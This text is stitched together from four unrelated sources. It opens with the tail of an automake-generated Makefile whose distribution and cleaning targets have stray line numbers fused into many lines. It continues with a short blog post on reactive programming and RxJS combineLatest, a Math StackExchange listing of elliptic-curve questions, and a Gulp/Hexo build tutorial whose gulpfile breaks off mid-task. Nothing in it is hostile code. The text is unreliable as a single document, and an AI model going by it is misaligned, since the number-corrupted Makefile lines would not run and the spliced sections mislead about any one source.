	  *) sdir=$(subdir)/$(srcdir) ;; \
	esac; \
	for i in $$list; do \
	  if test -f "$$i"; then \
	    echo "$(subdir)/$$i"; \
	  else \
	    echo "$$sdir/$$i"; \
	  fi; \
	done >> $(top_builddir)/cscope.files

distclean-tags:
	-rm -f TAGS ID GTAGS GRTAGS GSYMS GPATH tags
	-rm -f cscope.out cscope.in.out cscope.po.out cscope.files

distdir: $(DISTFILES)
	$(am__remove_distdir)
	test -d "$(distdir)" || mkdir "$(distdir)"
	@srcdirstrip=`echo "$(srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \
	topsrcdirstrip=`echo "$(top_srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \
	list='$(DISTFILES)'; \
	  dist_files=`for file in $$list; do echo $$file; done | \
	  sed -e "s|^$$srcdirstrip/||;t" \
	      -e "s|^$$topsrcdirstrip/|$(top_builddir)/|;t"`; \
	case $$dist_files in \
	  */*) $(MKDIR_P) `echo "$$dist_files" | \
	       sed '/\//!d;s|^|$(distdir)/|;s,/[^/]*$$,,' | \
	         sort -u` ;; \
	esac; \
	for file in $$dist_files; do \
	  if test -f $$file || test -d $$file; then d=.; else d=$(srcdir); fi; \
	  if test -d $$d/$$file; then \
	    dir=`echo "/$$file" | sed -e 's,/[^/]*$$,,'`; \
	    if test -d "$(distdir)/$$file"; then \
	      find "$(distdir)/$$file" -type d ! -perm -700 -exec chmod u+rwx {} \;; \
	    fi; \
	    if test -d $(srcdir)/$$file && test $$d != $(srcdir); then \
	      cp -fpR $(srcdir)/$$file "$(distdir)$$dir" || exit 1; \
	      find "$(distdir)/$$file" -type d ! -perm -700 -exec chmod u+rwx {} \;; \
468 fi; \
469 cp -fpR $$d/$$file "$(distdir)$$dir" || exit 1; \
470 else \
471 test -f "$(distdir)/$$file" \
472 || cp -p $$d/$$file "$(distdir)/$$file" \
473 || exit 1; \
474 fi; \
475 done
476 @list='$(DIST_SUBDIRS)'; for subdir in $$list; do \
477 if test "$$subdir" = .; then :; else \
478 $(am__make_dryrun) \
479 || test -d "$(distdir)/$$subdir" \
480 || $(MKDIR_P) "$(distdir)/$$subdir" \
481 || exit 1; \
482 dir1=$$subdir; dir2="$(distdir)/$$subdir"; \
483 $(am__relativize); \
484 new_distdir=$$reldir; \
485 dir1=$$subdir; dir2="$(top_distdir)"; \
486 $(am__relativize); \
487 new_top_distdir=$$reldir; \
488 echo " (cd $$subdir && $(MAKE) $(AM_MAKEFLAGS) top_distdir="$$new_top_distdir" distdir="$$new_distdir" \\"; \
489 echo " am__remove_distdir=: am__skip_length_check=: am__skip_mode_fix=: distdir)"; \
490 ($(am__cd) $$subdir && \
491 $(MAKE) $(AM_MAKEFLAGS) \
492 top_distdir="$$new_top_distdir" \
493 distdir="$$new_distdir" \
494 am__remove_distdir=: \
495 am__skip_length_check=: \
496 am__skip_mode_fix=: \
497 distdir) \
498 || exit 1; \
499 fi; \
500 done
501 -test -n "$(am__skip_mode_fix)" \
502 || find "$(distdir)" -type d ! -perm -755 \
503 -exec chmod u+rwx,go+rx {} \; -o \
504 ! -type d ! -perm -444 -links 1 -exec chmod a+r {} \; -o \
505 ! -type d ! -perm -400 -exec chmod a+r {} \; -o \
506 ! -type d ! -perm -444 -exec $(install_sh) -c -m a+r {} {} \; \
507 || chmod -R a+r "$(distdir)"
508dist-gzip: distdir
509 tardir=$(distdir) && $(am__tar) | GZIP=$(GZIP_ENV) gzip -c >$(distdir).tar.gz
510 $(am__post_remove_distdir)
511
512dist-bzip2: distdir
513 tardir=$(distdir) && $(am__tar) | BZIP2=$${BZIP2--9} bzip2 -c >$(distdir).tar.bz2
514 $(am__post_remove_distdir)
515
516dist-lzip: distdir
517 tardir=$(distdir) && $(am__tar) | lzip -c $${LZIP_OPT--9} >$(distdir).tar.lz
518 $(am__post_remove_distdir)
519
520dist-xz: distdir
521 tardir=$(distdir) && $(am__tar) | XZ_OPT=$${XZ_OPT--e} xz -c >$(distdir).tar.xz
522 $(am__post_remove_distdir)
523
524dist-tarZ: distdir
525 @echo WARNING: "Support for distribution archives compressed with" \
526 "legacy program 'compress' is deprecated." >&2
527 @echo WARNING: "It will be removed altogether in Automake 2.0" >&2
528 tardir=$(distdir) && $(am__tar) | compress -c >$(distdir).tar.Z
529 $(am__post_remove_distdir)
530
531dist-shar: distdir
532 @echo WARNING: "Support for shar distribution archives is" \
533 "deprecated." >&2
534 @echo WARNING: "It will be removed altogether in Automake 2.0" >&2
535 shar $(distdir) | GZIP=$(GZIP_ENV) gzip -c >$(distdir).shar.gz
536 $(am__post_remove_distdir)
537
538dist-zip: distdir
539 -rm -f $(distdir).zip
540 zip -rq $(distdir).zip $(distdir)
541 $(am__post_remove_distdir)
542
543dist dist-all:
544 $(MAKE) $(AM_MAKEFLAGS) $(DIST_TARGETS) am__post_remove_distdir='@:'
545 $(am__post_remove_distdir)
546
547# This target untars the dist file and tries a VPATH configuration. Then
548# it guarantees that the distribution is self-contained by making another
549# tarfile.
550distcheck: dist
551 case '$(DIST_ARCHIVES)' in \
552 *.tar.gz*) \
553 GZIP=$(GZIP_ENV) gzip -dc $(distdir).tar.gz | $(am__untar) ;;\
554 *.tar.bz2*) \
555 bzip2 -dc $(distdir).tar.bz2 | $(am__untar) ;;\
556 *.tar.lz*) \
557 lzip -dc $(distdir).tar.lz | $(am__untar) ;;\
558 *.tar.xz*) \
559 xz -dc $(distdir).tar.xz | $(am__untar) ;;\
560 *.tar.Z*) \
561 uncompress -c $(distdir).tar.Z | $(am__untar) ;;\
562 *.shar.gz*) \
563 GZIP=$(GZIP_ENV) gzip -dc $(distdir).shar.gz | unshar ;;\
564 *.zip*) \
565 unzip $(distdir).zip ;;\
566 esac
567 chmod -R a-w $(distdir)
568 chmod u+w $(distdir)
569 mkdir $(distdir)/_build $(distdir)/_build/sub $(distdir)/_inst
570 chmod a-w $(distdir)
571 test -d $(distdir)/_build || exit 0; \
572 dc_install_base=`$(am__cd) $(distdir)/_inst && pwd | sed -e 's,^[^:\\/]:[\\/],/,'` \
573 && dc_destdir="$${TMPDIR-/tmp}/am-dc-$$$$/" \
574 && am__cwd=`pwd` \
575 && $(am__cd) $(distdir)/_build/sub \
576 && ../../configure \
577 $(AM_DISTCHECK_CONFIGURE_FLAGS) \
578 $(DISTCHECK_CONFIGURE_FLAGS) \
579 --srcdir=../.. --prefix="$$dc_install_base" \
580 && $(MAKE) $(AM_MAKEFLAGS) \
581 && $(MAKE) $(AM_MAKEFLAGS) dvi \
582 && $(MAKE) $(AM_MAKEFLAGS) check \
583 && $(MAKE) $(AM_MAKEFLAGS) install \
584 && $(MAKE) $(AM_MAKEFLAGS) installcheck \
585 && $(MAKE) $(AM_MAKEFLAGS) uninstall \
586 && $(MAKE) $(AM_MAKEFLAGS) distuninstallcheck_dir="$$dc_install_base" \
587 distuninstallcheck \
588 && chmod -R a-w "$$dc_install_base" \
589 && ({ \
590 (cd ../.. && umask 077 && mkdir "$$dc_destdir") \
591 && $(MAKE) $(AM_MAKEFLAGS) DESTDIR="$$dc_destdir" install \
592 && $(MAKE) $(AM_MAKEFLAGS) DESTDIR="$$dc_destdir" uninstall \
593 && $(MAKE) $(AM_MAKEFLAGS) DESTDIR="$$dc_destdir" \
594 distuninstallcheck_dir="$$dc_destdir" distuninstallcheck; \
595 } || { rm -rf "$$dc_destdir"; exit 1; }) \
596 && rm -rf "$$dc_destdir" \
597 && $(MAKE) $(AM_MAKEFLAGS) dist \
598 && rm -rf $(DIST_ARCHIVES) \
599 && $(MAKE) $(AM_MAKEFLAGS) distcleancheck \
600 && cd "$$am__cwd" \
601 || exit 1
602 $(am__post_remove_distdir)
603 @(echo "$(distdir) archives ready for distribution: "; \
604 list='$(DIST_ARCHIVES)'; for i in $$list; do echo $$i; done) | \
605 sed -e 1h -e 1s/./=/g -e 1p -e 1x -e '$$p' -e '$$x'
606distuninstallcheck:
607 @test -n '$(distuninstallcheck_dir)' || { \
608 echo 'ERROR: trying to run $@ with an empty' \
609 '$$(distuninstallcheck_dir)' >&2; \
610 exit 1; \
611 }; \
612 $(am__cd) '$(distuninstallcheck_dir)' || { \
613 echo 'ERROR: cannot chdir into $(distuninstallcheck_dir)' >&2; \
614 exit 1; \
615 }; \
616 test `$(am__distuninstallcheck_listfiles) | wc -l` -eq 0 \
617 || { echo "ERROR: files left after uninstall:" ; \
618 if test -n "$(DESTDIR)"; then \
619 echo " (check DESTDIR support)"; \
620 fi ; \
621 $(distuninstallcheck_listfiles) ; \
622 exit 1; } >&2
623distcleancheck: distclean
624 @if test '$(srcdir)' = . ; then \
625 echo "ERROR: distcleancheck can only run from a VPATH build" ; \
626 exit 1 ; \
627 fi
628 @test `$(distcleancheck_listfiles) | wc -l` -eq 0 \
629 || { echo "ERROR: files left in build directory after distclean:" ; \
630 $(distcleancheck_listfiles) ; \
631 exit 1; } >&2
632check-am: all-am
633check: check-recursive
634all-am: Makefile
635installdirs: installdirs-recursive
636installdirs-am:
637install: install-recursive
638install-exec: install-exec-recursive
639install-data: install-data-recursive
640uninstall: uninstall-recursive
641
642install-am: all-am
643 @$(MAKE) $(AM_MAKEFLAGS) install-exec-am install-data-am
644
645installcheck: installcheck-recursive
646install-strip:
647 if test -z '$(STRIP)'; then \
648 $(MAKE) $(AM_MAKEFLAGS) INSTALL_PROGRAM="$(INSTALL_STRIP_PROGRAM)" \
649 install_sh_PROGRAM="$(INSTALL_STRIP_PROGRAM)" INSTALL_STRIP_FLAG=-s \
650 install; \
651 else \
652 $(MAKE) $(AM_MAKEFLAGS) INSTALL_PROGRAM="$(INSTALL_STRIP_PROGRAM)" \
653 install_sh_PROGRAM="$(INSTALL_STRIP_PROGRAM)" INSTALL_STRIP_FLAG=-s \
654 "INSTALL_PROGRAM_ENV=STRIPPROG='$(STRIP)'" install; \
655 fi
656mostlyclean-generic:
657
658clean-generic:
659
660distclean-generic:
661 -test -z "$(CONFIG_CLEAN_FILES)" || rm -f $(CONFIG_CLEAN_FILES)
662 -test . = "$(srcdir)" || test -z "$(CONFIG_CLEAN_VPATH_FILES)" || rm -f $(CONFIG_CLEAN_VPATH_FILES)
663
664maintainer-clean-generic:
665 @echo "This command is intended for maintainers to use"
666 @echo "it deletes files that may require special tools to rebuild."
667clean: clean-recursive
668
669clean-am: clean-generic mostlyclean-am
670
671distclean: distclean-recursive
672 -rm -f $(am__CONFIG_DISTCLEAN_FILES)
673 -rm -f Makefile
674distclean-am: clean-am distclean-generic distclean-tags
675
676dvi: dvi-recursive
677
678dvi-am:
679
680html: html-recursive
681
682html-am:
683
684info: info-recursive
685
686info-am:
687
688install-data-am:
689
690install-dvi: install-dvi-recursive
691
692install-dvi-am:
693
694install-exec-am:
695
696install-html: install-html-recursive
697
698install-html-am:
699
700install-info: install-info-recursive
701
702install-info-am:
703
704install-man:
705
706install-pdf: install-pdf-recursive
707
708install-pdf-am:
709
710install-ps: install-ps-recursive
711
712install-ps-am:
713
714installcheck-am:
715
716maintainer-clean: maintainer-clean-recursive
717 -rm -f $(am__CONFIG_DISTCLEAN_FILES)
718 -rm -rf $(top_srcdir)/autom4te.cache
719 -rm -f Makefile
720maintainer-clean-am: distclean-am maintainer-clean-generic
721
722mostlyclean: mostlyclean-recursive
723
724mostlyclean-am: mostlyclean-generic
725
726pdf: pdf-recursive
727
728pdf-am:
729
730ps: ps-recursive
731
732ps-am:
733
734uninstall-am:
735
736.MAKE: $(am__recursive_targets) install-am install-strip
737
738.PHONY: $(am__recursive_targets) CTAGS GTAGS TAGS all all-am \
739 am--refresh check check-am clean clean-cscope clean-generic \
740 cscope cscopelist-am ctags ctags-am dist dist-all dist-bzip2 \
741 dist-gzip dist-lzip dist-shar dist-tarZ dist-xz dist-zip \
742 distcheck distclean distclean-generic distclean-tags \
743 distcleancheck distdir distuninstallcheck dvi dvi-am html \
744 html-am info info-am install install-am install-data \
745 install-data-am install-dvi install-dvi-am install-exec \
746 install-exec-am install-html install-html-am install-info \
747 install-info-am install-man install-pdf install-pdf-am \
748 install-ps install-ps-am install-strip installcheck \
749 installcheck-am installdirs installdirs-am maintainer-clean \
750 maintainer-clean-generic mostlyclean mostlyclean-generic pdf \
751 pdf-am ps ps-am tags tags-am uninstall uninstall-am
752
753.PRECIOUS: Makefile
754
755
756# Tell versions [3.59,3.63) of GNU make to not export all variables.
757# Otherwise a system limit (for SysV at least) may be exceeded.
758.NOEXPORT:
Aymen on 01/5/2017
If you want to learn VueJS/Angular/React/Node, just contact me.
What is Reactive programming?
Reactive programming is learning to program completely around asynchronous data streams.
So what is the difference between imperative programming and reactive programming?
Imperative programming focuses on the order in which the computer does things. Reactive programming only cares about the order in which things need to happen; reactive programs are written ignorant of the time and context in which they run.
If you are a front-end developer, you have probably already written reactive code without even realizing it. Yes: DOM events like key presses wait for a stream of input data and respond accordingly.
Reactive programming is completely different from a sequential workflow: reactive programs react when something happens.
Let's take an example from Rx (Reactive Extensions):
The combineLatest operator is used to synchronize two Observable streams into a single Observable stream.
combineLatest doesn't use a queue; as its name suggests, it only remembers the latest value of each stream.
(Marble diagram illustrating combineLatest on two streams, x and y.)
We can see that when the y stream observes the value b, the result stream combines it with the latest value observed on the x stream (3), and later the same value is combined into the result stream when the x stream observes the value 4.
The combineLatest processing comes to an end either when one of the streams completes or when one throws an exception; in this case the y stream runs complete (onComplete before RxJS 5).
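To make this concrete, here is a minimal sketch of combineLatest written against the RxJS 6+ API (the post itself predates it, so import paths and some names differ slightly; the two streams below are purely illustrative):

const { combineLatest, interval } = require('rxjs');
const { map, take } = require('rxjs/operators');

// x emits 1, 2, 3, 4 once a second; y emits 'a', 'b' every 1.5 seconds.
const x$ = interval(1000).pipe(map(i => i + 1), take(4));
const y$ = interval(1500).pipe(map(i => 'ab'[i]), take(2));

// Each time either stream emits, the latest values of both are combined.
combineLatest([x$, y$]).subscribe(([x, y]) => console.log(x, y));
// Logs something like: 1 'a', 2 'a', then 3/'b' in timing-dependent order, then 4 'b'.

The key design point is exactly what the marble diagram shows: no buffering, just the most recent value per stream.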
Did you feel lost?
I felt the same the first time I read about reactive programming and RxJS. The hardest part of the learning journey is thinking in Reactive. It's a lot about letting go of old imperative and stateful habits of typical programming, and forcing your brain to work in a different paradigm.
What about you? Is it worth learning nowadays?
If you have any corrections you can open a pull request on GitHub: What is Reactive programming? on GitHub
For questions regarding elliptic curves. Questions on ellipses should be tagged [conic-sections] instead.
7 votes · 2 answers · 1k views
Local-Global Principle and the Cassels statement.
In a recent article I have read, i.e. "Lecture notes on elliptic curves", Prof. Cassels remarks on page 110 that there is not merely a local-global principle for curves of genus $0$, but ...

26 votes · 1 answer · 1k views
Does an elementary solution exist to $x^2+1=y^3$?
Prove that there are no positive integer solutions to $$x^2+1=y^3$$ This problem is easy if you apply Catalan's conjecture, and is still doable talking about Gaussian integers and UFDs. However, can this ...

6 votes · 3 answers · 2k views
Group Law for an Elliptic curve
I was reading the book "Rational Points on Elliptic Curves" by J. Silverman and J. Tate, two prominent figures in number theory, and was very intrigued after reading the first couple of pages. The ...

5 votes · 3 answers · 2k views
Integral points on an elliptic curve
Let's start with an elliptic curve in the form $$E : y^2 = x^3 + Ax + B, \qquad A, B \in \mathbb{Z}.$$ I am wondering about integral points. I know that Siegel proved that $E$ has only finitely many ...

27 votes · 1 answer · 3k views
How to compute rational or integer points on elliptic curves
This is an attempt to get someone to write a canonical answer, as discussed in this meta thread. We often have people come to us asking for solutions to a diophantine equation which, after some clever ...

17 votes · 2 answers · 4k views
Elliptic Curves and Points at Infinity
My undergraduate number theory class decided to dip into a bit of algebraic geometry to finish up the semester. I'm having trouble understanding this bit of information that the instructor presented ...

17 votes · 1 answer · 624 views
More elliptic curves for $x^4+y^4+z^4 = 1$?
(Note: This has been updated to be similar with this MO post.) There are exactly 22 known primitive solutions to $$a^4+b^4+c^4 = d^4\tag{1}$$ with $d<10^{11}$. Noam Elkies showed that $(1)$ as, ...

3 votes · 2 answers · 421 views
Calculating the divisors of the coordinate functions on an elliptic curve
I am currently reading Silverman's Arithmetic of Elliptic Curves. In chapter II, reviewing divisors, there is an explicit calculation: Given $y^2 = (x-e_1)(x-e_2)(x-e_3)$ let $P_i = (e_i,0),$ and $ ...

5 votes · 1 answer · 218 views
Cube of an integer
$\frac{x}{y}+\frac{y}{z}+\frac{z}{x}=k$ and $x, y, z, k$ are integers. Prove that $xyz$ is the cube of some integer. I was wondering about giving a parametrization for the rational points on ...

9 votes · 2 answers · 376 views
Making an elliptic curve out of a cubic polynomial made a cube, or $ax^3+bx^2+cx+d = y^3$
What is the transformation such that a general cubic polynomial to be made a cube, $$ax^3+bx^2+cx+d = y^3\tag{1}$$ can be transformed to Weierstrass form, $$x^3+Ax+B = t^2\tag{2}$$ (The special ...

5 votes · 1 answer · 640 views
Intuition and Stumbling blocks in proving the finiteness of WC group
After reading many articles about the Tate-Shafarevich group, I understood that "in a naive perspective the group is nothing but the measure of the failure of the Hasse principle", and coming to its ...

4 votes · 1 answer · 84 views
How I can express $(x,y)∈G$ by using the $r$ independent points $P_1,P_2,\ldots,P_r$
Let $C$ be an elliptic curve over $ℚ$. The group $C(ℚ)$ is a finitely generated Abelian group and we have $C(ℚ)≃ℤ^{r}⊕C(ℚ)^\mathrm{tors}$, where $C(ℚ)^\mathrm{tors}$ is a finite abelian group (is the ...

2 votes · 1 answer · 117 views
Finding the order of a point on an elliptic curve
Just started studying elliptic curves and am having trouble with this question. An explanation/solution would be much appreciated. Find the order of the point X on the elliptic curve $E/Q$ for the ...

11 votes · 2 answers · 1k views
The modular curve X(N)
I have a question about the modular curve X(N), which classifies elliptic curves with full level N structure. (A level N structure of an elliptic curve E is an isomorphism from $Z/NZ \times Z/NZ$ to ...

8 votes · 1 answer · 149 views
Why does the elliptic curve for $a+b+c = abc = 6$ involve a solvable nonic?
The curve discussed in this OP's post, $$\color{brown}{-24a+36a^2-12a^3+a^4}=z^2\tag1$$ is birationally equivalent to an elliptic curve. Following E. Delanoy's post, let $G$ be the set of rational ...

6 votes · 1 answer · 144 views
Rational map of a curve to an elliptic curve
If I have a curve given by $$ y^2 = (x^3-1)(x^3-a), $$ how do I find out if there is a rational variable transformation $y=y(s,t)$, $x=x(s,t)$ that maps this curve onto an elliptic curve of the form ...

3 votes · 1 answer · 226 views
How could we show that the abelian group has $\text{rank}=0$?
Let $E/\mathbb{Q}$ be the elliptic curve $Y^2=X^3+p^2X$ with $p \equiv 5 \pmod 8$. Show that the abelian group $E(\mathbb{Q})$ has $\text{rank}=0$. Could you give me a hint how we could do this? It is ...

3 votes · 1 answer · 295 views
Modular functions and elliptic functions
Does anybody know of an equation formally equating modular functions and elliptic functions, similar to Euler's equation for exponential and trigonometric functions? Any advice much appreciated. ...

10 votes · 3 answers · 967 views
Can you recommend some books on elliptic functions?
I plan to study elliptic functions. Can you recommend some books? What is the relationship between elliptic functions and elliptic curves? Many thanks in advance!

6 votes · 1 answer · 265 views
UPDATE: How to find the order of an elliptic curve over a finite field extension
I want to find the order of an elliptic curve over the finite field extension $\mathbb{F}_{p^2}$, where $E(\mathbb{F}_{p^2}):y^2=x^3+ax+b$. I am using the method illustrated by John J. McGee in his ...

4 votes · 1 answer · 853 views
How to find all rational points on elliptic curves like $y^2=x^3-2$
Reading the book by Diophantus, one may be led to consider curves like $y^2=x^3+1$, $y^2=x^3-1$, $y^2=x^3-2$, the first two of which are easy (after calculating some eight curves to be solved ...

3 votes · 1 answer · 79 views
How to obtain the lattice corresponding to an elliptic curve
Let $C$ be a complex elliptic curve given by the equation $y^2=4x^3-g_2 x -g_3$. How do I find the lattice $\Lambda$ such that $C \cong \mathbb{C}/\Lambda$? I need the lattice (and corresponding ...

2 votes · 1 answer · 209 views
Looking for help with this elementary method of finding integer solutions on an elliptic curve.
In the post Finding all solutions to $y^3 = x^2 + x + 1$ with $x,y$ integers larger than $1$, the single positive integer solution $(x,y)=(18,7)$ is found using algebraic integers. In one of the ...

2 votes · 1 answer · 43 views
What is the argument used to distinguish the cases (a) and (b)
We know from [B. Mazur, Modular curves and the Eisenstein ideal, Publ. math. IHES 47 (1977), 33-186] that if $C$ is an elliptic curve of the form ($C:y²=x³+ax+b$ with $a,b∈ℤ$), then $C(ℚ)^{tors}$ (the ...

2 votes · 1 answer · 222 views
Proving the condition for two elliptic curves given in Weierstrass form to be isomorphic
I'm taking a course on elliptic curves and trying to understand the proof of Proposition 3.2. Let $E$, $E'$ be elliptic curves over $K$ in Weierstrass form: ...

4 votes · 2 answers · 180 views
The group $E(\mathbb{F}_p)$ has exactly $p+1$ elements
Let $E/\mathbb{F}_p$ be the elliptic curve $y^2=x^3+Ax$. We suppose that $p \geq 7$ and $p \equiv 3 \pmod {4}$. I want to show that the group $E(\mathbb{F}_p)$ has exactly $p+1$ elements. I was ...

3 votes · 1 answer · 68 views
Commutativity of "extension" and "taking the radical" of ideals
Let $K$ be a field (not necessarily algebraically closed) and $\overline{K}$ its algebraic closure. By $K[\text{X}]$, I mean $K[X_1,...,X_n]$. Is it true that the operations of "extension" and ...

3 votes · 1 answer · 60 views
Multiplication by $m$ isogenies of elliptic curves in characteristic $p$
I've been attempting to prove some comments I've read on MO by myself for my undergrad thesis regarding étale morphisms of elliptic curves. My definition of an étale morphism is taken from Milne's ...

3 votes · 1 answer · 120 views
Finding two non-congruent right-angle triangles
The map $g: B \to A, \ (x,y) \mapsto \left(\dfrac {x^2 - 25} y, \dfrac {10x} y, \dfrac {x^2 + 25} y \right)$ is a bijection where $A = \{ (a,b,c) \in \Bbb Q ^3 : a^2 + b^2 = c^2, \ ab = 10 \}$ and $B ...

2 votes · 2 answers · 119 views
Reason behind standard names of coefficients in the long Weierstrass equation
A long Weierstrass equation is an equation of the form $$y^2+a_1xy+a_3y=x^3+a_2x^2+a_4x+a_6$$ Why are the coefficients named $a_1, a_2, a_3, a_4$ and $a_6$ in this manner, corresponding to $xy, x^2, ...

2 votes · 1 answer · 107 views
Number of points on $Y^2 = X^3 + A$ over $\mathbb{F}_p$
Let $p\equiv 2\pmod{3}$ be prime and let $A\in\mathbb{F}^{∗}_p$. Show that the number of points (including the point at infinity) on the curve $Y^2 = X^3 + A$ over $\mathbb{F}_p$ is exactly $p + 1$ ...

1 vote · 0 answers · 53 views
Is it possible to say that every point $P$ in $C(ℚ)$ other than the 'basis' is of finite order?
Let $C$ be an elliptic curve over $\mathbb Q$. Assume that the rank of $C(ℚ)$ is equal to $r$. Then the cardinality of a maximal independent set in $C(ℚ)$ is $r$, thus there exist $r$ independent points ...

1 vote · 1 answer · 94 views
Violating assertion in Cohen's instructions for Weierstrass reduction
I am trying to follow case 2 of the procedure given in Cohen: for the cubic $f(x,y,z) = x^3 + 3 y^3 - 11 z^3$ using the rational point $P_0 = (2 : 1 : 1)$. The tangent at this point is $y = - ...

0 votes · 0 answers · 69 views
Can we extend the map $φ$ to $ℝ^{r}×C(ℚ)^{\text{tors}}→C(ℚ)$ as an isomorphism or not?
The motivation for this question can be found in "How I can express $(x,y)∈G$ by using the $r$ independent points $P_1,P_2,\ldots,P_r$". We know that there is an isomorphism ...

35 votes · 3 answers · 840 views
The resemblance between Mordell's theorem and Dirichlet's unit theorem
The first one states that if $E/\mathbf Q$ is an elliptic curve, then $E(\mathbf Q)$ is a finitely generated abelian group. If $K/\mathbf Q$ is a number field, Dirichlet's theorem says (among other ...

23 votes · 3 answers · 758 views
Find integers of the form: $\frac{a}{b+c} + \frac{b}{c+a} + \frac{c}{a+b}$
Let $a,b,c \in \mathbb N$; find the integers of the form $$I=\frac{a}{b+c} + \frac{b}{c+a} + \frac{c}{a+b}$$ Using Nesbitt's inequality, $I \ge \frac 32$. I am trying to prove $I \le 2$, which implies ...

11 votes · 2 answers · 177 views
Diophantine equation $x^2 + xy + y^2 = \left({{x+y}\over{3}} + 1\right)^3$.
Solve in integers the equation $$x^2 + xy + y^2 = \left({{x+y}\over3} + 1\right)^3.$$

13 votes · 2 answers · 842 views
How are the Tate-Shafarevich group and class group supposed to be cognates?
How can one consider the Tate-Shafarevich group and the class group of a field to be analogues? I have heard many authors and even many expository papers saying so; the class group, as far as I know, is ...

8 votes · 1 answer · 2k views
Reading the mind of Prof. John Coates (motive behind his statement)
To start with the issue, I have been thinking for many days that the Birch and Swinnerton-Dyer conjectures should have some association with Galois theory, but one day I got the article of Tate called ...

13 votes · 1 answer · 2k views
Explicit Derivation of Weierstrass Normal Form for Cubic Curve
On pages 22-23 of Rational Points on Elliptic Curves by Silverman and Tate, the authors explain why it is possible to put every cubic curve into Weierstrass Normal Form. Here are the relevant pages: (My ...

11 votes · 2 answers · 764 views
Is the real locus of an elliptic curve the intersection of a torus with a plane?
In Lawrence Washington's book Elliptic Curves: Number Theory and Cryptography I read that if $E$ is an elliptic curve defined over the real numbers $\mathbb{R}$ then the set of real points ...

3 votes · 1 answer · 114 views
Rational points on a particular elliptic curve
I do have a few books that discuss elliptic curves, however... What are the rational points on $$ y^2 = 4 x^3 - 4 x = 4 x(x-1)(x+1)? $$ I think it ought to be $(-1,0), (0,0), (1,0).$ Maybe it's ...

8 votes · 2 answers · 267 views
Integer solutions of $x^3 = 7y^3 + 6 y^2+2 y$?
Does the equation $$x^3 = 7y^3 + 6 y^2+2 y\tag{1}$$ have any positive integer solutions? This is equivalent to a conjecture about OEIS sequence A245624. Maple tells me this is a curve of genus $1$, ...

8 votes · 3 answers · 1k views
References for elliptic curves
I just finished reading Silverman and Tate's Rational Points on Elliptic Curves and thought it was very interesting. Could any of you point me to some more references (e.g., books, articles) on ...

6 votes · 1 answer · 107 views
(question title not captured in this listing)

5 votes · 0 answers · 191 views
What is stopping every Mordell equation from having a [truly] elementary proof?
The Mordell equation is the Diophantine equation $$Y^2 = X^3-k \tag{1}$$ where $k$ is a given integer. There is no known single method — elementary or otherwise — to solve equation $(1)$ for all $k$, ...

10 votes · 3 answers · 577 views
Integer solutions for $x^3+2=y^2$?
I've heard a famous result that $26$ is the only integer such that $26-1=25$ is a square number and $26+1=27$ is a cubic number. In other words, $(x,y)=(5,3)$ is the only solution for $x^2+2=y^3$. ...

9 votes · 2 answers · 114 views
Order of an elliptic curve
I have found that the curve given by $x^3+x+1=y^2$ over $\mathbb{F_5}$ has 9 points. Now I am supposed to find the number of points of the same curve over $\mathbb{F}_{125}$. Using Hasse and the fact ...

5 votes · 1 answer · 755 views
How do I show that this curve has a nonsingular model of genus 1?
Let $C$ be the projective closure of $Z(f) \subset \mathbf{A}^2$ where $f$ is an irreducible polynomial of degree 4 in $x$ and degree 2 in $y$, so $C = Z(f^*) \subset \mathbf{P}^2$ where $f^*$ is the ...

4 votes · 2 answers · 442 views
On the relationship between Fermat's Last Theorem and Elliptic Curves
I have to give a presentation on elliptic curves in general. It does not have to be very in depth. I have a very basic understanding of elliptic curves (the most I understand is the concept of ranks). ...
Gulp scripts
For how to download and configure Gulp, here is the tutorial I followed: "Using Gulp to compress static resources in Hexo". Step 2 there is required, I used step 3, and I did not follow steps 4-5.
Here I want to highlight two things: the script execution order, and trimming the commands down.
Script execution order
// Execution order: clean the public directory -> generate the raw blog content -> run minification -> deploy to the server
gulp.task(
  "default",
  gulp.series(
    "clean",
    "generate",
    "compressHtml",
    "compressCss",
    "compressJs",
    gulp.parallel("deploy")
  )
);
• First clean, which removes the previously generated public folder
• Then the pages are generated
• Next the HTML, CSS, and JS files are compressed, in that order
• Finally the local build is deployed to the GitHub Pages repository
Trimming the commands down
Originally we needed three commands (hexo clean, then hexo g, then hexo d) to get a deployment done. With gulp, however, we can define custom tasks, as in the code above: we can set their order and also choose the command that triggers the whole job. For example, here I use the default task name; when a task is registered as default, typing just gulp in the terminal kicks off the execution order described above. One command now bundles several steps, so we can be a little "lazy".
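As a small, hypothetical illustration of the same idea, you could register a second named task (reusing the clean, generate, and server tasks defined in the gulpfile below) and trigger it by name:

// Hypothetical extra task: rebuild the site and serve it locally.
// Run it from the terminal with: gulp preview
gulp.task("preview", gulp.series("clean", "generate", "server"));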
The full code
First create a gulpfile.js file in the Hexo directory.
If that file already exists, just open it and replace its contents with the code I provide below.
var gulp = require("gulp");
var debug = require("gulp-debug");
var cleancss = require("gulp-clean-css"); // CSS minification plugin
var uglify = require("gulp-uglify"); // JS minification plugin
var htmlmin = require("gulp-htmlmin"); // HTML minification plugin
var htmlclean = require("gulp-htmlclean"); // HTML cleanup plugin
var changed = require("gulp-changed"); // file-change detection plugin
var gulpif = require("gulp-if"); // conditional pipeline helper plugin
var plumber = require("gulp-plumber"); // error-tolerance plugin (reports errors without aborting the task)
var isScriptAll = true; // process all files? (true = all files, false = only changed files)
var isDebug = true; // print the files that were processed, for debugging
var gulpBabel = require("gulp-babel");
var es2015Preset = require("babel-preset-es2015");
var del = require("del");
var Hexo = require("hexo");
var hexo = new Hexo(process.cwd(), {}); // initialize a Hexo instance

// Clean the public folder
gulp.task("clean", function () {
  return del(["public/**/*"]);
});

// The Hexo-related tasks below run mainly through hexo.call(); note the returns.
// Generate the static pages (equivalent to hexo generate)
gulp.task("generate", function () {
  return hexo.init().then(function () {
    return hexo
      .call("generate", {
        watch: false
      })
      .then(function () {
        return hexo.exit();
      })
      .catch(function (err) {
        return hexo.exit(err);
      });
  });
});

// Start the Hexo server
gulp.task("server", function () {
  return hexo
    .init()
    .then(function () {
      return hexo.call("server", {});
    })
    .catch(function (err) {
      console.log(err);
    });
});

// Deploy to the server
gulp.task("deploy", function () {
  return hexo.init().then(function () {
    return hexo
      .call("deploy", {
        watch: false
      })
      .then(function () {
        return hexo.exit();
      })
      .catch(function (err) {
        return hexo.exit(err);
      });
  });
});

// Minify the JS files under the public directory
gulp.task("compressJs", function () {
  return gulp
    .src(["./public/js/*.js", "!./public/js/utils.js"]) // excluded JS
